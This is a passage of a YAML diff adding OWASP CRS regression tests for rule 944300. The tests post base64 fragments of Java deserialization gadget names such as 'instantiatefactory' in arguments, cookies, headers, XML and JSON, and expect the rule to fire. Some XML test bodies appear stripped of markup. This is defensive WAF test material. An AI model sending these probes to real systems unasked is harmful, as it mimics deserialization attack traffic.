"Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-107 + desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-108 + desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-109 + desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-110 + desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-111 + desc: "Argument test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-112 + desc: "Argument name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-113 + desc: "Cookie test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-114 + desc: "Cookie name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-115 + desc: "Request header test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-116 + desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-117 + desc: "XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-118 + desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-119 + desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-120 + desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-121 + desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-122 + desc: "Argument test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-123 + desc: "Argument name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-124 + desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-125 + desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-126 + desc: "Request header test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-127 + desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-128 + desc: "XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-129 + desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-130 + desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-131 + desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-132 + desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-133 + desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-134 + desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-135 + desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-136 + desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-137 + desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-138 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-139 + desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-140 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-141 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-142 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-143 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-144 + desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-145 + desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-146 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-147 + desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-148 + desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-149 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-150 + desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-151 + desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-152 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-153 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-154 + desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-155 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-156 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-157 + 